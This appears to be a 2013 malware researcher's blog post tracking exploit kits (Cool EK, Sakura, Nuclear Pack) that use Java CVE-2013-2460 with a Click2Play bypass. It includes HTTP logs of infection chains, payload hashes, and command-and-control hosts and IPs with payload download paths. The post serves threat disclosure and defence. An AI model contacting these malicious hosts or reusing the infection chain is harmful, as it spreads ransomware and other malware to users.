A new variant of a "Kore-ish" Cool EK appeared few days ago.
Yes...it's difficult to follow the EK fast moving landscape...No payload in the jar for that one.
 |
| Some instances of this "Cool EK" in URLQuery |
It is also used to spread the Urausy Ransomware and FakeAV (so... BestAV stuff)
All jar found there were identical as those in Blackhole. Till today.
CVE-2013-2460 + Click2Play Bypass :
That CVE was already in use in Private Exploit Pack but it was noisy (Imposition then made it optional )
 |
| CVE-2013-2460 successfull path in Cool EK (Kore-ish) Click2Play Bypass inside 2013-09-20 |
GET http://[redacted].tacogratis .com/index.php?p=5267
200 OK (text/html)
 |
| Key Piece of the landing |
GET http://[redacted].tacogratis .com/index.php?p=5290
200 OK (text/javascript)
GET http://[redacted].tacogratis .com/index.php?p=5268 fb1decbef1c4361eb421a3496201ef30
200 OK (application/java-archive)
GET http://[redacted].tacogratis .com/index.php?p=5268
200 OK (application/java-archive)
GET http://cghtuj.tacogratis .com/index.php?p=5275&e=14
200 OK (application/x-msdownload) 170896de44d75651bbbd9358b0f11c34 (Urausy Ransomware)
----- Off Topic ----
Payload is rotating fast (2 more md5) :
b56348220f83ad9db50cb5beb564148b
64ef8f2cb215af4b2fbcb51cadfcc025
 |
| Urauy Ransomware - DE design - 2013-09-20 (BestAV soft 2) |
Note : on another thread you can get a FakeAV
 |
| Payload call with bigger charge |
9d8d3094849f685859945140721aafb1
7fb9423c4bdf7080137745e81ba38362
13e24b552ea472146495ac8a33cca975
 |
| Other payload from this "Kore-ish" Cool EK (BestAV Soft1) |
So what's that Click2Play bypass ?
Quite surely : http://seclists.org/bugtraq/2013/Jul/41
2013-06-18 - Vulnerability Fixed in Java 7u25
Yes :
 |
| Warning with jre7u25 (and as CVE-2013-2460 is patch too...clicking on run there won't put you at risk) |
5 days ago :
EKs vs jre7u21 : http://t.co/jCkdtnp7NW
— kafeine (@kafeine) September 15, 2013
Who sold it ?
??
No download link for now. Yes it will spread fast anyway.
It's easy to get rid of all these Exploit Kits : update !
<edit1 2013-09-21>
Already in Sakura...surely cause of that blog post. It's often difficult to decide how much you can write about something.
Sakura CVE-2013-2460 & Click2Play Bypass :
 |
Sakura featuring CVE-2013-2460 & Click2Play bypass 2013-09-21 |
GET http://[redacted]253 .pw:8509/me.php
200 OK (text/html)
 |
| Precision Strike new Click2Play bypass for 21 version |
 |
| Jnlp call |
GET http://[redacted] .pw:8509/[redacted].ee
200 OK (application/java-archive) dca89d839abbb8f621a87de94d20d8f2 CVE-2013-2460
 |
| Piece of CVE-2013-2460 in Sakura Jar 2013-09-21 |
200 OK (application/java-archive)
GET http://[redacted] .pw:8509/2889.ld
200 OK (application/octet-stream) Once decoded : 5fba8226303967ccfd27ea8710a8b99d I think it's a Smokebot
----- Off Topic ----
C&C Calls :
mexstat757.com POST /satep757/index.php
mexstat220.pw GET /setex/sev57.exe
mexstat220.pw GET /setex/sev57.exe
mexstat220.pw GET /setex/pm555.exe
etc...
46.165.201.27
16265 | 46.165.192.0/18 | LEASEWEB | DE | LEASEWEB.COM | LEASEWEB GERMANY GMBH
46.165.201.27
16265 | 46.165.192.0/18 | LEASEWEB | DE | LEASEWEB.COM | LEASEWEB GERMANY GMBH
It's the same guys than those who were behind this one year old post :
Since then Smoke Bot is now encrypting its network calls.
----------------------
<edit2: 2013-09-23>
Nuclear Pack : CVE-2013-2460 + Click2Play bypass
Announced Underground :
"добавлен новы exploit, пробив увеличен. работает тихо и не палится" Nuclear
which means something like:
"New exploit added, breaking rate increased, works silently and scorched"
 |
| CVE-2013-2460 with no security prompt successful path in Nuclear Pack 2013-09-23 |
GET http://[redacted].flogdoyfohoqobl .biz:12421/3dfa4ffa555573ba6fbb54a243289806/4/5b1bb46b5a96bee3ebbb1d2251d968bb.html
200 OK (text/html)
 |
| Precision Strike (Thanks @EKWatcher ) |
 |
| jnlp call in Nuclear Pack After Deobfuscation (Thanks @EKWatcher ) |
GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar
200 OK (application/java)
GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar
200 OK (application/java) e03455403f226b23be42b30733a26101
 |
| Piece of CVE-2013-2460 in Nuclear Pack 2013-09-23 |
200 OK (application/octet-stream) Decoded : 3a9d1dcad1176717711eb92b25f7d6b0
GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2/2
200 OK (application/octet-stream)
----------- Out of Topic -----------
C&C :
185.6.80.125 - 61422 | 185.6.80.0/24 | TD-VITA | RU | - | TD-VITA LLC.
for instance :
POST /mBj7
Analysis by Joe Sandbox Cloud
------------------------------------
</edit2>